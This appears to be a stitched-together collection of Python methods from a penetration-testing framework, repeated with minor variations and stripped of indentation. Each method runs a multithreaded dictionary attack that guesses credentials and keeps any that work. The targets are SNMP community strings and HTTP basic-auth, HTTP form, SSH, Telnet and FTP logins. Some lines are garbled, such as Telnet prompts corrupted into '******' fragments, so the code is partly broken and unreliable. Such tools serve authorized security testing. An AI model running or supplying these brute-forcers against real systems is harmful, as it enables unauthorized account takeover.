def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
cmdGen = cmdgen.CommandGenerator()
while running.is_set():
try:
string = data.next().strip()
errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
cmdgen.CommunityData(string),
cmdgen.UdpTransportTarget((self.target, int(self.port))),
'1.3.6.1.2.1.1.1.0',
)
if errorIndication or errorStatus:
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
else:
if boolify(self.exit_on_success):
running.clear()
print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip()
response = http_request(method="GET", url=url, auth=(user, password))
if response.status_code != 401:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password)
except StopIteration:
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error("Target: {}:{} {}: {} Username: '******' Password: '******'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {} Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password)
r = requests.post(url, headers=headers, data=postdata, verify=False)
l = len(r.text)
if l < self.invalid["min"] or l > self.invalid["max"]:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
cmdGen = cmdgen.CommandGenerator()
while running.is_set():
try:
string = data.next().strip()
errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
cmdgen.CommunityData(string),
cmdgen.UdpTransportTarget((self.target, int(self.port))),
'1.3.6.1.2.1.1.1.0',
)
if errorIndication or errorStatus:
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password)
r = requests.post(url, headers=headers, data=postdata, verify=False)
l = len(r.text)
if l < self.invalid["min"] or l > self.invalid["max"]:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, "thread is starting...", verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
except StopIteration:
break
else:
retries = 0
while retries < 3:
try:
tn = telnetlib.Telnet(self.target, self.port)
tn.expect(["Login: "******"login: "******"\r\n")
tn.expect(["Password: "******"password"], 5)
tn.write(password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
print_error(
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(
self.target, self.port, name, user, password
),
verbose=module_verbosity,
)
else:
if (
any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500
): # big banner e.g. mikrotik
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(
self.target, self.port, name, user, password
),
verbose=module_verbosity,
)
self.credentials.append((self.target, self.port, user, password))
tn.close()
break
except EOFError:
print_error(name, "Connection problem. Retrying...", verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
continue
print_status(name, "thread is terminated.", verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].encode('utf-8').strip()
password = line[1].encode('utf-8').strip()
response = http_request(method="GET", url=url, auth=(user, password))
if response.status_code != 401:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password)
except StopIteration:
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error("Target: {}:{} {}: {} Username: '******' Password: '******'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {} Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'process is starting...', verbose=module_verbosity)
ftp = ftplib.FTP()
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
except StopIteration:
break
else:
retries = 0
while retries < 3:
try:
ftp.connect(self.target,
port=int(self.port),
timeout=10)
break
except (socket.error, socket.timeout):
print_error(
"{} Connection problem. Retrying...".format(name),
verbose=module_verbosity)
retries += 1
if retries > 2:
print_error(
"Too much connection problems. Quiting...",
verbose=module_verbosity)
return
try:
ftp.login(user, password)
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Authentication succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
self.credentials.append(
(self.target, self.port, user, password))
except:
print_error(
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
ftp.close()
print_status(name, 'process is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, "process is starting...", verbose=module_verbosity)
ftp = ftplib.FTP()
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
except StopIteration:
break
else:
retries = 0
while retries < 3:
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
break
except:
print_error("{} Connection problem. Retrying...".format(name), verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
try:
ftp.login(user, password)
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(
self.target, self.port, name, user, password
),
verbose=module_verbosity,
)
self.credentials.append((self.target, self.port, user, password))
except:
print_error(
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(
self.target, self.port, name, user, password
),
verbose=module_verbosity,
)
ftp.close()
print_status(name, "process is terminated.", verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
except StopIteration:
break
else:
retries = 0
while retries < 3:
try:
tn = telnetlib.Telnet(self.target, self.port, timeout=10)
tn.expect(["Login: "******"login: "******"\r\n")
tn.expect(["Password: "******"password"], 5)
tn.write(password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
else:
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
tn.close()
break
except EOFError:
print_error(name, "Connection problem. Retrying...", verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
continue
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
address = "{}:{}".format(self.target, self.port)
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
string = data.next().strip()
bindvariable = netsnmp.Varbind(".1.3.6.1.2.1.1.1.0")
res = netsnmp.snmpget(bindvariable, Version=1, DestHost=address, Community=string)
if res[0] is not None:
running.clear()
print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
else:
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password)
except StopIteration:
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error(name, err, "Username: '******' Password: '******'".format(user, password), verbose=module_verbosity)
else:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
print_status(name, 'process is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
address = "{}:{}".format(self.target, self.port)
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
string = data.next().strip()
bindvariable = netsnmp.Varbind(".1.3.6.1.2.1.1.1.0")
res = netsnmp.snmpget(bindvariable,
Version=1,
DestHost=address,
Community=string)
if res[0] is not None:
running.clear()
print_success(
"Target: {}:{} {}: Valid community string found - String: '{}'"
.format(self.target, self.port, name, string),
verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
else:
print_error(
"Target: {}:{} {}: Invalid community string - String: '{}'"
.format(self.target, self.port, name, string),
verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip()
r = requests.get(url, auth=(user, password), verify=False)
if r.status_code != 401:
running.clear()
print_success("{}: Authentication succeed!".format(name),
user,
password,
verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(
name,
"Authentication Failed - Username: '******' Password: '******'"
.format(user, password),
verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def print_response(self, response):
''' debug print for http_request response'''
if response is None:
return
if boolify(self.verbosity):
if response.text and len(response.text):
print_status(str(response.status_code) + "\n" + response.text)
else:
print_status(response.status_code)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
ssh.connect(self.target,
int(self.port),
timeout=5,
username=user,
password=password)
except StopIteration:
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error(name,
err,
"Username: '******' Password: '******'".format(
user, password),
verbose=module_verbosity)
else:
running.clear()
print_success("{}: Authentication succeed!".format(name),
user,
password,
verbose=module_verbosity)
self.credentials.append((user, password))
print_status(name, 'process is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'process is starting...', verbose=module_verbosity)
ftp = ftplib.FTP()
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
except StopIteration:
break
else:
retries = 0
while retries < 3:
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
break
except socket.error, socket.timeout:
print_error("{} Connection problem. Retrying...".format(name), verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
try:
ftp.login(user, password)
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
except:
print_error(name, "Authentication Failed - Username: '******' Password: '******'".format(user, password), verbose=module_verbosity)
ftp.close()
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].encode('utf-8').strip()
password = line[1].encode('utf-8').strip()
r = requests.get(url, auth=(user, password), verify=False)
if r.status_code != 401:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(name, "Authentication Failed - Username: '******' Password: '******'".format(user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)